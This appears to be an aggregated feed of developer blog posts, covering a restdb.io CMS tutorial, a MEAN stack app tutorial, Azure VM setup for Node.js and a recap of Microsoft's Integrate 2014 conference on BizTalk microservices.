          restdb.io is a plug and play cloud NoSQL database. It will be immediately familiar to anyone with MongoDB experience. The primary differences:

          • there's no need to manage your installation, storage or backups
          • you can define a data structure schema in restdb.io
          • data fields can have relationships with other fields in other collections
          • there's no need to define indexes
          • data can be queried and updated through a REST API authenticated by HTTP or Auth0/JWT tokens
          • queries and updates are sent and received in JSON format
          • there are tools to enter, view and export data in various formats
          • it supports some interesting bonus features such as codehooks, email, web form generation, websites, realtime messaging, and more.

          A free account allows you to assess the service with no obligation. Paid plans offer additional storage space, query throughput, developer accounts and MongoDB integration.

          In the following sections I'll describe how to:

          1. configure a new database and enter data
          2. use that data to render a set of web pages hosted on restdb.io, and
          3. use the API to provide a search facility for content editors.

          Step 1: Create a New Database

          After signing up with a Google, Facebook or email account, you can create a new empty database. This generates a new API endpoint URL at yourdbname.restdb.io:

          create a new database

          Step 2: Create a New Collection

          A database contains one or more collections for storing data. These are analogous to SQL database tables. Collections contain "documents" which are analogous to SQL database records (table rows).

          The restdb.io interface offers two modes:

          1. Standard mode shows the available collections and allows you to insert and modify data.
          2. Developer mode allows you to create and configure collections.

          enter developer mode

          Enter Developer Mode (top-right of screen) and click the Add Collection button.

          create a new collection

          A collection requires a unique name (I've used "content") and an optional description and icon. Hit Save to return to your database overview. The "content" collection will appear in the list along with several other non-editable system collections.

          Alternatively, data can be imported from Excel, CSV or JSON files to create a collection by hitting Import in the standard view.

          Step 3: Define Fields

          Staying in Developer Mode, click the "content" collection and choose the Fields tab. Click Add Fields to add and configure new fields which classify the data in the collection.

          create fields

          Each collection document will store data about a single page in the database-driven website. I've added five fields:

          • slug - a text field for the page path URL
          • title - a text field for the page title
          • body - a special markdown text field for the page content
          • image - a special image field which permits any number of uploaded images (which are also stored on the restdb.io system)
          • published - boolean value which must be true for pages to be publicly visible.

          Step 4: Add Documents

          Documents can be added to a collection in either standard or developer mode (or via the API). Create a few documents with typical page content:

          create documents

          The slug should be empty for the home page.

          Step 5: Create a Database-Driven Website (Optional)

          restdb.io provides an interesting feature which can create and host a database-driven website using data documents in a collection.

          The site is hosted at www-yourdbname.restdb.io but you can point any domain at the pages. For instructions, click Settings from the Database list or at the bottom of the left-hand panel then click the Webhosting tab.

          To create the website, Pages, which define templates to view the content, must be configured in Developer Mode. Templates contain a code snippet which sets:

          1. the context - a query which locates the correct document in a collection, and
          2. the HTML - a structure which uses handlebars template syntax to insert content into appropriate elements.

          Click Add Page to create a page. Name it the special name /:slug - this means the template will apply to any URL other than the home page (which does not have a slug). Hit Save and return to the page list, then click the /:slug entry to edit.

          Switch to the Settings tab and ensure text/html is entered as the Content Type and Publish is checked before hitting Update:

          create page

          Now switch to the Code for "/:slug" tab. Enter the context code at the top of the editor:

          {{#context}}
          {
            "docs": {
              "collection": "content",
              "query": {
                "slug": "{{pathparams.slug}}",
                "published": true
              }
            }
          }
          {{/context}}
          

          This defines a query so the template can access a specific document from our content collection. In this case, we're fetching the published document which matches the slug passed on the URL.

          All restdb.io queries return an array of objects. If no document is returned, the docs array will be empty, so we can add code immediately below the context to report that the page is not available:

          <!doctype html>
          {{#unless docs.[0]}}
            <html>
            <body>
              <h1>Page not available</h1>
              <p>Sorry, this page cannot be viewed. Please return later.</p>
            </body>
            </html>
          {{/unless}}
          

          Below this, we can code the template which slots the title, body and image fields into appropriate HTML elements:

          {{#with docs.[0]}}
            <html>
            <head>
              <meta charset="utf-8">
              <title>{{title}}</title>
              <meta name="viewport" content="width=device-width,initial-scale=1">
              <style>
                body {
                  font-family: sans-serif;
                  font-size: 100%;
                  color: #333;
                  background-color: #fff;
                  max-width: 40em;
                  padding: 0 2em;
                  margin: 1em auto;
                }
              </style>
            </head>
            <body>
              <header>
                {{#each image}}
                  <img src="https://sitepoint-fbbf.restdb.io/media/{{this}}" alt="image" />
                {{/each}}
          
                <h1>{{title}}</h1>
              </header>
              <main>
                {{markdown body}}
          
                <p><a href="/">Return to the home page...</a></p>
              </main>
            </body>
            </html>
          {{/with}}
          

          Note our markdown body field must be rendered with a markdown handler.

          Save the code with Ctrl|Cmd + S or by returning to the Settings tab and hitting Update.

          The /:slug page template will apply to all our content collection — except for the home page, because that does not have a slug! To render the home page, create a New Page with the name home with identical settings and content. You may want to tweak the template for home-page-specific content.

          Once saved, you can access your site from https://www-yourdbname.restdb.io/. I've created a very simple three-page site at https://www-sitepoint-fbbf.restdb.io/.

          For more information about restdb.io page hosting, refer to:

          Step 6: API Queries

          Creating a site to display your data may be useful, but you'll eventually want to build an application which queries and manipulates information.

          restdb.io's REST API provides endpoints controlled via HTTP:

          • HTTP GET requests retrieve data from a collection
          • HTTP POST requests create new documents in a collection
          • HTTP PUT requests update documents in a collection
          • HTTP PATCH requests update one or more properties in a document in a collection
          • HTTP DELETE requests delete documents from a collection

          There are a number of APIs for handling uploaded media files, database meta data and mail but the one you'll use most often is for collections. The API URL is:

          https://yourdbname.restdb.io/rest/collection-name/

          The URL for my "content" collection is therefore:

          https://sitepoint-fbbf.restdb.io/rest/content/
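
          The same collection URL also accepts the write methods listed above. Here is a compact sketch (not taken from the restdb.io docs) of the POST case, creating a new document in the "content" collection with the fetch API; CREATE_API_KEY is a placeholder for a key that has POST access to the collection:

          // create a new page document in the content collection
          fetch('https://sitepoint-fbbf.restdb.io/rest/content', {
            method: 'POST',
            headers: {
              'x-apikey': 'CREATE_API_KEY',
              'content-type': 'application/json'
            },
            body: JSON.stringify({
              slug: 'page-four',
              title: 'Page Four',
              body: 'page content...',
              published: false
            })
          })
            .then(function(res) { return res.json(); })
            .then(function(doc) { console.log('created', doc); });
          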
          

          Queries are passed to this URL as a JSON-encoded querystring parameter named q, e.g. fetch all published articles in the collection:

          https://sitepoint-fbbf.restdb.io/rest/content?q={"published": true}
          

          However, this query will fail without an API key passed in the x-apikey HTTP header. A full-access API key is provided by default but it's advisable to create keys which are limited to specific actions. From the database Settings, API tab:

          create a new database

          Click Add New to create a new key. The one I created here is limited to GET (query) requests on the content collection only. You should create a similarly restricted key if you will be using client-side JavaScript Ajax code since the string will be visible in the code.

          It's now possible to build a standalone JavaScript query handler (ES5 has been used to ensure cross-browser compatibility without a pre-compile step!):

          // restdb.io query handler
          var restDB = (function() {
          
            // configure for your own DB
            var 
              api = 'https://sitepoint-fbbf.restdb.io/rest/',
              APIkey = '597dd2c7a63f5e835a5df8c4';
          
            // query the database
            function query(url, callback) {
          
              var timeout, xhr = new XMLHttpRequest();
          
              // set URL and headers
              xhr.open('GET', api + url);
              xhr.setRequestHeader('x-apikey', APIkey);
              xhr.setRequestHeader('content-type', 'application/json');
              xhr.setRequestHeader('cache-control', 'no-cache');
          
              // response handler
              xhr.onreadystatechange = function() {
                if (xhr.readyState !== 4) return;
                var err = (xhr.status !== 200), data = null;
                clearTimeout(timeout);
                if (!err) {
                  try {
                    data = JSON.parse(xhr.response);
                  }
                  catch(e) {
                    err = true;
                    data = xhr.response || null;
                  }
                }
                callback(err, data);
              };
          
              // timeout
              timeout = setTimeout(function() {
                xhr.abort();
                callback(true, null);
              }, 10000);
          
              // start call
              xhr.send();
            }
          
            // public query method
            return {
              query: query
            };
          
          })();
          

          This code passes queries to the restdb.io API endpoint and sets the appropriate HTTP headers including x-apikey for the API key. It times out if the response takes longer than ten seconds. A callback function is passed an error and any returned data as a native object. For example:

          // run a query
          restDB.query(
            '/content?q={"published":true}',
            function(err, data) {
              // success!
              if (!err) console.log(data);
            }
          );
          

          The console will output an array of documents from the content collection, e.g.

          [
            {
              _id: "1111111111111111",
              slug: "",
              title: "Home page",
              body: "page content...",
              image: [],
              published: true
            },
            {
              _id: "22222222222222222",
              slug: "page-two",
              title: "Page Two",
              body: "page content...",
              image: [],
              published: true
            },
            {
              _id: "33333333333333333",
              slug: "page-three",
              title: "Another page",
              body: "page content...",
              image: [],
              published: true
            }
          ]
          

          The API can be called from any language which can make an HTTP request. restdb.io provides examples for cURL, jQuery $.ajax, JavaScript XMLHttpRequest, NodeJS, Python, PHP, Java, C#, Objective-C and Swift.
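
          As an illustration of the same idea outside the browser, here is a minimal Node.js sketch that performs the GET query with the built-in https module. It is not one of the restdb.io examples; the database name and API key are the placeholder values used earlier in this article, so substitute your own:

          // query the content collection from Node.js
          const https = require('https');
          
          const q = encodeURIComponent(JSON.stringify({ published: true }));
          
          const options = {
            hostname: 'sitepoint-fbbf.restdb.io',
            path: '/rest/content?q=' + q,
            headers: {
              'x-apikey': '597dd2c7a63f5e835a5df8c4',
              'content-type': 'application/json',
              'cache-control': 'no-cache'
            }
          };
          
          https.get(options, (res) => {
            let body = '';
            res.on('data', (chunk) => { body += chunk; });
            res.on('end', () => {
              if (res.statusCode !== 200) {
                console.error('Request failed:', res.statusCode, body);
                return;
              }
              console.log(JSON.parse(body)); // array of matching documents
            });
          }).on('error', (err) => console.error(err));
          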

          I've created a simple example at Codepen.io which allows you to search for strings in the title and body fields and displays the results:

          See the Pen restdb.io query by SitePoint (@SitePoint) on CodePen.

          It passes the following query:

          { "$or": [
            { "title": {"$regex": "searchstring"} }, 
            { "body":  {"$regex": "searchstring"} }
          ]}
          

          where searchstring is the search text entered by the user.

          An additional h querystring parameter limits the returned fields to just the slug, title and published flag:

          {
            "$fields": {
              "slug": 1,
              "title": 1,
              "published": 1
            }
          }
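
          As a quick sketch reusing the restDB.query helper from above, both parameters can be combined on a single request. The field names are those of the "content" collection defined earlier, and "mongo" is just an example search string:

          var search = 'mongo';
          
          var q = JSON.stringify({
            '$or': [
              { title: { '$regex': search } },
              { body:  { '$regex': search } }
            ]
          });
          
          var h = JSON.stringify({
            '$fields': { slug: 1, title: 1, published: 1 }
          });
          
          restDB.query(
            '/content?q=' + encodeURIComponent(q) + '&h=' + encodeURIComponent(h),
            function(err, data) {
              // each returned document now contains only slug, title and published
              if (!err) console.log(data);
            }
          );
          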
          

          Further information:

          Step 7: Build Your Own CMS

          A few steps were required to create a database-driven website and a simple search facility. You could edit pages directly using restdb.io's user interface but it would be possible to build a bespoke CMS to manipulate the content. It would require:

          1. A new restdb.io API key (or change the existing one) to have appropriate GET, POST, PUT, PATCH and DELETE access to the content collection.
          2. A user interface to browse or search for pages (the one above could be a good starting point).
          3. A process to start a new page or GET existing content and place it in an editable form.
          4. Processes to add, update or delete pages using the appropriate HTTP methods.

          The editing system should run on a restricted device or behind a login to ensure only authenticated users can access it. Take care not to reveal your restdb.io API key if using client-side code!
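
          As a rough ES5 sketch of the update step (point 4 above), the snippet below PATCHes a single document. Two assumptions here are not covered in this article: that documents are addressed by their _id as /rest/content/<id>, and that WRITE_API_KEY is a separate key created with PATCH access to the content collection:

          // update one or more fields of an existing page document
          function updatePage(id, fields, callback) {
            var xhr = new XMLHttpRequest();
            xhr.open('PATCH', 'https://sitepoint-fbbf.restdb.io/rest/content/' + id);
            xhr.setRequestHeader('x-apikey', 'WRITE_API_KEY');
            xhr.setRequestHeader('content-type', 'application/json');
            xhr.onreadystatechange = function() {
              if (xhr.readyState !== 4) return;
              callback(xhr.status !== 200, xhr.response);
            };
            xhr.send(JSON.stringify(fields));
          }
          
          // e.g. rename a page and take it offline
          updatePage('22222222222222222', { title: 'Page Two (draft)', published: false }, function(err) {
            if (!err) console.log('updated');
          });
          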

          Further information:

          Try restdb.io Today!

          This article uses restdb.io to build a rudimentary CMS, but the service is suitable for any project which requires data storage. The REST API can be accessed from any language or framework which makes it ideal for applications with multiple interfaces, e.g. a web and native mobile view.

          restdb.io provides a practical alternative to managing your own database software installation. It's simple to use, fast, powerful, highly scalable and considerably less expensive than hiring a database expert! Your application hosting costs will also reduce since all data is securely stored and backed-up on the restdb.io servers.

          Finally, restdb.io makes you more productive. You can concentrate on the main application because data storage no longer causes concerns for you and your team.

          Start building your restdb.io database today and let us know how you get on!

          Continue reading %How to Get Started With restdb.io and Create a Simple CMS%


                    MEAN Stack: Developing an app with Angular 2+ and the Angular CLI        

          The MEAN stack comprises advanced technologies used to develop both the server-side and the client-side of a web application in a JavaScript environment. The components of the MEAN stack include the MongoDB database, Express.js (a web framework), Angular (a front-end framework), and the Node.js runtime environment. Taking control of the MEAN stack and familiarizing yourself with the different JavaScript technologies during the process will help you in becoming a full-stack JavaScript developer.

          JavaScript’s sphere of influence has dramatically grown over the years and with that growth, there is an ongoing desire to keep up with the latest trends in programming. New technologies have emerged and existing technologies have been rewritten from the ground up (I am looking at you, Angular).

          This tutorial intends to create the MEAN application from scratch and serve as an update to the original MEAN stack tutorial. If you are familiar with MEAN and want to get started with the coding, you can skip to the overview section.

          Introduction to MEAN Stack

          Node.js - Node.js is a server-side runtime environment built on top of Chrome's V8 JavaScript engine. Node.js is based on an event-driven architecture that runs on a single thread and a non-blocking IO. These design choices allow you to build real-time web applications in JavaScript that scale well.

          Express.js - Express is a minimalistic yet robust web application framework for Node.js. Express.js uses middleware functions to handle HTTP requests and then either return a response or pass on the parameters to another middleware. Application-level, Router-level, and Error-handling middlewares are available in Express.js.

          MongoDB - MongoDB is a document-oriented database program where the documents are stored in a flexible JSON-like format. Being a NoSQL database program, MongoDB relieves you from the tabular jargon of the relational database.

          Angular - Angular is an application framework developed by Google for building interactive Single Page Applications. Angular, originally AngularJS, was rewritten from scratch to shift to a Component based architecture from the age old MVC framework. Angular recommends the use of TypeScript which, in my opinion, is a good idea because it enhances the development work-flow.

          Now that we are acquainted with the pieces of the MEAN puzzle, let’s see how we can fit them together, shall we?

          Overview

          Here is a high-level overview of our application.

          High-level overview of our MEAN stack application

          We will be building an Awesome Bucket List Application from the ground up without using any boilerplate template. The front-end will include a form that accepts your bucket list items and a view that updates and renders the whole bucket list in real-time.

          Any update to the view will be interpreted as an event and this will initiate an HTTP request. The server will process the request, update/fetch the MongoDB if necessary, and then return a JSON object. The front-end will use this to update our view. By the end of this tutorial, you should have a bucket list application that looks like this.

          Screenshot of the bucket list application that we are going to build

          The entire code for the Bucket List application is available on GitHub.

          Prerequisites

          First things first, you need to have Node.js and MongoDB installed to get started. If you are entirely new to Node, I would recommend reading the Beginner’s Guide to Node to get things rolling. Likewise, setting up MongoDB is easy and you can check out their documentation for installation instructions specific to your platform.

          $ node -v
          # v8.0.0
          

          Start the mongo daemon service using the command.

          sudo service mongod start
          

          To install the latest version of Angular, I would recommend using Angular-CLI. It offers everything you need to build and deploy your angular application. If you are not familiar with the Angular CLI yet, make sure you check out The Ultimate Angular CLI Reference.

          npm install -g @angular/cli
          

          Create a new directory for our bucket list project. That’s where all your code will go, both the front end and the back end.

          mkdir awesome-bucketlist
          cd awesome-bucketlist
          

          Creating the Backend Using Express.js and MongoDB

          Express doesn’t impose any structural constraints on your web application. You can place the entire application code in a single file and get it to work, theoretically. However, your code base would be a complete mess. Instead, we are going to do this the MVC (Model, View, and Controller) way (minus the view part).

          MVC is an architectural pattern that separates your models (the back-end) and views (the UI) from the controller (everything in between), hence MVC. Since Angular will take care of the front-end for us, we will have three directories, one for models and another one for controllers, and a public directory where we will place the compiled angular code.

          In addition to this, we will create an app.js file that will serve as the entry point for running the Express server.

          Directory structure of MEAN stack
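
          For orientation, here is one plausible layout that matches the description above; the file names inside the models and controllers directories are illustrative and correspond to files created in later steps:

          awesome-bucketlist/
          ├── app.js             // entry point for the Express server
          ├── package.json
          ├── config/
          │   └── database.js    // MongoDB connection string
          ├── controllers/
          │   └── bucketlist.js
          ├── models/
          │   └── bucketlist.js
          └── public/            // compiled Angular code goes here
          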

          Although using a model and controller architecture to build something trivial like our bucket list application might seem essentially unnecessary, this will be helpful in building apps that are easier to maintain and refactor.

          Initializing npm

          We’re missing a package.json file for our back end. Type in npm init and, after you’ve answered the questions, you should have a package.json made for you.

          We will declare our dependencies inside the package.json file. For this project we will need the following modules.

          • express: Express module for the web server
          • mongoose: A popular library for MongoDB
          • bodyparser: Parses the body of the incoming requests and makes it available under req.body
          • cors: CORS middleware enables cross-origin access control to our web server.

          I’ve also added a start script so that we can start our server using npm start.

          {
            "name": "awesome-bucketlist",
            "version": "1.0.0",
            "description": "A simple bucketlist app using MEAN stack",
            "main": "app.js",
            "scripts": {
              "start": "node app"
            },
            "dependencies": {
              "express": "~4.15.3",
              "mongoose": "~4.11.0",
              "cors": "~2.8.3",
              "body-parser": "~1.17.2"
            },
            "author": "",
            "license": "ISC"
          }
          
          The ~ is used to match the most recent minor version (without any breaking changes). Note that comments are not valid JSON, so they cannot appear inside package.json itself.
          

          Now run npm install and that should take care of installing the dependencies.

          Filling in app.js

          First, we require all of the dependencies that we installed in the previous step.

          // We will declare all our dependencies here
          const express = require('express');
          const path = require('path');
          const bodyParser = require('body-parser');
          const cors = require('cors');
          const mongoose = require('mongoose');
          
          //Initialize our app variable
          const app = express();
          
          //Declaring Port
          const port = 3000;
          

          As you can see, we’ve also initialized the app variable and declared the port number. The app object gets instantiated on the creation of the Express web server. We can now load middleware into our Express server by specifying them with app.use().

          //Middleware for CORS
          app.use(cors());
          
          //Middleware for bodyparsing using both json and urlencoding
          app.use(bodyParser.urlencoded({extended:true}));
          app.use(bodyParser.json());
          
          /* express.static is a built-in middleware function to serve static files.
             We are telling the Express server that the public folder is the place to look for static files.
          */
          app.use(express.static(path.join(__dirname, 'public')));
          

          The app object can understand routes too.

          app.get('/', (req,res) => {
              res.send("Invalid page");
          })
          

          Here, the get method invoked on the app corresponds to the GET HTTP method. It takes two parameters, the first being the path or route for which the middleware function should be applied.

          The second is the actual middleware itself and it typically takes three arguments: The req argument corresponds to the HTTP Request; the res argument corresponds to the HTTP Response; and next is an optional callback argument that should be invoked if there are other subsequent middlewares that follow this one. We haven’t used next here since the res.send() ends the request-response cycle.
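
          For illustration (this is not part of the original tutorial), a minimal middleware that does call next() could look like the sketch below; it logs every incoming request and then hands control to the next middleware or route handler in the chain:

          //Log each request, then continue down the middleware chain
          app.use((req, res, next) => {
              console.log(`${req.method} ${req.url}`);
              next();
          });
          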

          Add this line towards the end to make our app listen to the port that we had declared earlier.

          //Listen to port 3000
          app.listen(port, () => {
              console.log(`Starting the server at port ${port}`);
          });
          

          npm start should get our basic server up and running.

          By default, npm doesn’t monitor your files/directories for any changes and you have to manually restart the server every time you’ve updated your code. I recommend using nodemon to monitor your files and automatically restart the server when any changes are detected. If you don't explicitly state which script to run, nodemon will run the file associated with the main property in your package.json.

          npm install -g nodemon
          nodemon
          

          We are nearly done with our app.js file. What’s left to do? We need to

          1. Connect our server to the database.
          2. Create a controller which we can then import to our app.js.

          Setting up mongoose

          Setting up and connecting a database is straightforward with MongoDB. First, create a config directory and a file named database.js to store our configuration data. Export the database URI using module.exports.

          // 27017 is the default port number.  
          module.exports = {
              database: 'mongodb://localhost:27017/bucketlist'
          }
          

          And establish a connection with the database in app.js using mongoose.connect().

          // Connect mongoose to our database
          const config = require('./config/database');
          mongoose.connect(config.database);
          

          "But what about creating the bucket list database?", you may ask. The database will be created automatically when you insert a document into a new collection on that database.

          Working on the controller and the model

          Now let’s move on to creating our bucket list controller. Create a bucketlist.js file inside the controllers directory. We also need to route all /bucketlist requests to our bucketlist controller (in app.js).

          const bucketlist = require('./controllers/bucketlist');
          
          //Routing all HTTP requests to /bucketlist to bucketlist controller
          app.use('/bucketlist',bucketlist);
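
          At this stage, a minimal sketch of controllers/bucketlist.js could look like the following. It is not shown in this excerpt of the article and assumes a mongoose model (for example models/bucketlist.js) that backs the collection:

          // controllers/bucketlist.js
          const express = require('express');
          const router = express.Router();
          const BucketList = require('../models/bucketlist');
          
          //GET /bucketlist - return every bucket list item as JSON
          router.get('/', (req, res) => {
              BucketList.find({}, (err, items) => {
                  if (err) return res.status(500).send(err);
                  res.json(items);
              });
          });
          
          module.exports = router;
          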
          

          Here is the final version of our app.js file.

          Continue reading %MEAN Stack: Developing an app with Angular 2+ and the Angular CLI%


                    Comment on Overriding GNU Make SHELL variable for massive parallel make by inodb (@inodb)        
          Hi, nice post. I can't really seem to find any information on other people using GXP. Any idea why? Yours is the only post I can find that even mentions it and it is from 2008. It seems to work quite well for me. Great if you, like me, write bioinformatic pipelines in GNU make. Any thoughts on the reason for using daemons? Handling interrupts perhaps?
                    Build a 3-node mongodb cluster using puppet (for use with High Availability Graylog in this case)        

          One of the core components of a Graylog installation is MongoDB. Quite possibly the worst database ever to grace the planet :)

          Hopefully, from a Graylog perspective, MongoDB will disappear from the solution soon.

          Anyway, from an architecture perspective, we want to use a highly available Graylog deployment, aka Graylog HA.… Read the rest

          The post Build a 3-node mongodb cluster using puppet (for use with High Availability Graylog in this case) appeared first on vmware admins.


                    Interactive map of the world's meteorites        
          A fun map of the last several thousand years of meteorite impacts on Earth. The past week's focus on the meteorite impact in Russia has prompted Javier de la Torre, co-founder of the geo-tech companies Vizzuality and CartoDB, to create an interactive map of the world's meteorite impacts. Here you can see ...
                    Two-way databinding to a MongoDB collection in WPF        
          I’ll show how to have a two-way databinding between a templated listbox and a MongoDB collection. I’ve finally got around to toying with MongoDB. What I’ll show next might not be the most correct way, but it works for me. Setup I have a Listview defined in XAML with a datatemplate: I created an Entity class (can be […]
                    Setup MongoDB in Node.js Azure VM with attached Data Disk as DB storage.        

          To set up Node.js on an Azure VM, check out the blog Create Azure Virtual Machine and Setup Node.js. Now, moving forward, let's start by attaching a Data Disk to your previously set up Azure Virtual Machine.

          Attach a Data Disk to Azure Virtual Machine :

          1. In the left navigational bar select VIRTUAL MACHINES in Management Portal.

          Now at bottom-left corner select +New.

          2. For basic needs select QUICK CREATE.

          1. Give a name to your VM in the DNS NAME.
          2. Select Ubuntu Server image(14.04 LTS will be ideal).
          3. Based on your performance needs, select the SIZE of VM.
          4. Azure, by default, creates the USER NAME as azureuser.
          5. Next is PASSWORD (No need to describe what has to be done here).
          6. Last but quite important is REGION/AFFINITY GROUP. If you have created any Affinity Group and want your VM to be in that Group select it or select the region based on your location.
          7. As soon as you click Create A Virtual Machine, Azure will create it in a few moments.

          If you are planning to create a cluster of VMs with better latency between them, then first create a Virtual Network and later, while creating VMs, use FROM GALLERY and add the VN you want to use in the REGION/AFFINITY GROUP/VIRTUAL NETWORK option. You can give a desirable name to the VM in FROM GALLERY mode.

          Access your Virtual Machine :

          For users operating from Windows, the preferred SSH client is PuTTY,
          whereas users operating from Linux might want to use an SSH client such as OpenSSH.

          Get your Host Name and Port information from the Management Portal. You can get all the information about your VM from the dashboard of the virtual machine. Click the virtual machine name and find your SSH Details.

          Command to connect from Linux after having installed OpenSSH.

          # ssh user_name@DNS_NAME
          

          Here DNS_NAME is your host-name.cloudapp.net. Then enter your password. (Now that you are on your VM, feel free to play around with it like any other Ubuntu machine.)

          Azure by default opens port 22 for SSH, and you can configure the rest as per your needs under ENDPOINTS in the Management Portal.

          Set up Node.js:

          Node.js is built on a JavaScript runtime platform for building fast network applications. You can design network applications with both the front end and the back end utilizing JavaScript within the same system, providing more consistency. To get Node.js on your machine, use the apt package manager.

          sudo apt-get update
          sudo apt-get install nodejs
          

          To move on, you will also want to install npm, the Node.js package manager.

          sudo apt-get install npm
          

          This will enable you to easily install and manage the modules and packages to use with Node.js.

          In Ubuntu the executable is called nodejs instead of node because of a conflict with another package named node.

          To get the Node.js version of your choice, you can also install it through a PPA (personal package archive) or perhaps NVM (Node Version Manager) for more flexibility.


                    Integrate 2014 Recap        

          I have recently made it home from a great week at Redmond’s Microsoft campus where I attended the Integrate 2014 event.  I want to take this opportunity to thank both Microsoft and BizTalk360 for being the lead sponsors and organizers of the event.


          I also want to call out to the other sponsors, as these events typically do not take place without this type of support.  I think it is also a testament to just how deep Microsoft’s partner ecosystem really is, and it was a pleasure to interact with you over the course of the week.


          Speaking at the event

          I want to thank Microsoft and BizTalk360 for inviting me to speak at this event. This was the first time that I have had the chance to present at Microsoft’s campus and it was an experience I don’t think I will ever forget.  I have been to Microsoft campus probably around 20 times for various events but have never had the opportunity to present.  It was a pretty easy decision.

          One of the best parts of being involved in the Microsoft MVP program is the international network that you develop. Many of us have been in the program for several years and really value each other’s experience and expertise.  Whenever we get together, we often compare notes and talk about the industry.  We had a great conversation about the competitive landscape.  We also discussed the way that products are being sold with a lot of buzzwords and marketecture.  People were starting to get caught up in this instead of focusing on some of the fundamental requirements.  Much like any project should be based upon a formal, methodical, requirements driven approach, so should buying an integration platform.

          These concepts introduced the idea of developing a whitepaper where we would identify requirements "if I was buying" an integration platform. Joining me on this journey were Michael Stephenson and Steef-Jan Wiggers.  We focused on both functional and nonfunctional requirements. We also took this opportunity to rank the Microsoft platform, which includes BizTalk Server, BizTalk Services, Azure Service Bus and Azure API Management.  Our ranking was based upon experiences with these tools and how our generic integration requirements could be met by the Microsoft stack. This whitepaper is available on the BizTalk360 site for free.  Whether you are a partner, system integrator, integration consultant or customer, you are welcome to use and alter it as you see fit.  If you feel we have missed some requirements, you are encouraged to reach out to us.  We are already planning a 1.1 version of this document to address some of the recent announcements from the Integrate event.

          My presentation focused on 10 of the different requirements that were introduced in the paper.  I also included a ‘Legacy Modernization’ demo that highlights Microsoft’s ability to deliver on some of the requirements that were discussed in the whitepaper.  This session was recorded and will be published on the BizTalk360 site in the near future.

           

          Recap

          Disclaimer: What I am about to discuss is all based upon public knowledge that was communicated during the event.  I have been careful to ensure what is described is accurate to the best of my knowledge.  It was a fast and furious 3 days with information moving at warp speed. I have also included some of my own opinions which may or may not be inline with Microsoft’s way of thinking.   For some additional perspectives, I encourage you to check out the following blog posts from the past week:

          Event Buildup

          There was a lot of build-up to this event; with Integration MVPs seeing some early demos, there was cause for a lot of excitement.  This spilled over to Twitter, where @CrazyBizTalk posted this prior to the event kicking off.  The poster (I know who you are) was correct: there has never been so much activity on Twitter related to Microsoft Integration. Feel free to check out the timeline for yourself here.


          Picture Source @CrazyBizTalk

          Keynote

          The ever-so-popular Scott Guthrie, otherwise known as "Scott Gu", kicked off the Integrate 2014 event.  Scott is the EVP of Microsoft’s Cloud and Enterprise groups.  He provided a broad update on the Azure platform, describing all of the recent investments that have been rolled out.

          Picture Source @SamVanhoutte


          Some of the more impressive points that Scott made about Azure include:

          • Azure Active Directory supports identity federation with 2342 SaaS platforms
          • Microsoft Azure is the only cloud provider in all 4 Gartner magic quadrants
          • Microsoft Azure provides the largest VMs in the cloud known as ‘G’ Machines (for Godzilla).  These VMs support 32 cores, 448 GB of Ram and 6500 GB of SSD Storage
          • Microsoft is adding 10 000+ customers per week to Microsoft Azure

          For some attendees, I sensed some confusion about why there would be so much emphasis on Microsoft Azure. In hindsight, it makes a lot of sense.  Scott was really setting the stage for what would become a conference focused on a cohesive Azure platform where BizTalk becomes one of the centerpieces.


          Picture Source @gintveld

          A Microservices platform is born

          Next up was Bill Staples.  Bill is the General Manager for the Azure Application Platform or what is also known as “Azure App Platform”.  Azure App Platform is the foundational ‘fabric’ that currently enables a lot of Azure innovation and will fuel the next generation integration tools for Microsoft.

          A foundational component of Azure App Platform is App Containers.  These containers support many underlying Azure technologies that enable:

          • > 400k Apps Hosted
          • 300k Unique Customers
          • 120% Yearly Subscription Growth
          • 2 Billion Transactions daily

          Going forward we can expect BizTalk ‘capabilities’ to run inside these containers.  As you can see, I don’t think we will have any performance constraints.


          Picture Source @tomcanter

          Later in the session, it was disclosed that Azure App Platform will enable new BizTalk capabilities that will be available in the form of Microservices.  Microservices will provide the ability to perform service composition in a really granular way.  We will have the ability to ‘chain’ these Microservices together inside of a browser (at design time), while enjoying the benefits of deploying to an enterprise platform that will provide message durability, tracking, management and analytics.

          I welcome this change.  The existing BizTalk platform is very reliable, robust, understood, and supported.  The challenge is that the BizTalk core, or engine, is over 10 years old and the integration landscape has evolved with BizTalk struggling to maintain pace.

          BizTalk capabilities exposed as Microservices puts Microsoft in the forefront of integration platforms leapfrogging many innovative competitors.  It allows Microsoft’s customers to enable transformational scenarios for their business.  Some of the Microservices that we can expect to be part of the platform include:

          • Workflow (BPM)
          • SaaS Connectivity
          • Rules (Engine)
          • Analytics
          • Mapping (Transforms)
          • Marketplace
          • API Management


          Picture Source @jeanpaulsmit

          We can also see where Microsoft is positioning BizTalk Microservices within this broader platform: 


          Picture Source @wearsy

          What is exciting about this new platform is the role that BizTalk now plays in it.  For a while now, people have felt that BizTalk is that system that sits in the corner that people do not like to talk about.  Now, BizTalk is a key component within the App Platform that will enable many integration scenarios, including new lightweight scenarios that have been challenging for BizTalk Server to support in the past.

          Whenever there is a new platform introduced like this, there is always the tendency to chase ‘shiny objects’ while ignoring some of the traditional capabilities of the existing platform that allowed you to gain the market share that you achieved.  Microsoft seems to have a good handle on this and has outlined the Fundamentals that they are using to build this new platform.  This was very encouraging to see. 


          Picture Source @wearsy

          At this point the room was buzzing.  Some people were nodding their heads with delight (including myself), others were struggling with the term Microservice, and others were concerned about their existing requirements and how they fit into the new world.  I will now break down some more details on the types of Microservices that we can expect to see in this new platform.

          Workflow Microservice

          One of the current gaps in Microsoft Azure BizTalk Services (MABS) is workflow.  In the following image we will see the workflow composer which is hosted inside a web browser.  Within this workflow we have the ability to expose it as a Microservice, but we also have the ability to pull in other Microservices such as a SaaS connector or a Rules Service.


          Picture Source @saravanamv

          In the right-hand corner of this screen we can see some of these Microservices that we can pull in.  The picture is a little "grainy", but some of the items include:

          • Validation
          • Retrieve Employee Details (custom Microservice I suppose)
          • Rules
          • Custom Filter
          • Acme (custom Microservice I suppose)
          • Survey Monkey (SaaS Connector)
          • Email (SaaS Connector)


          Picture Source (@mikaelsand)

          In the demo we were able to see a Workflow being triggered, and the tracking information was made available in real time.  There is also the ability to schedule a workflow, run it manually or trigger it from another process.

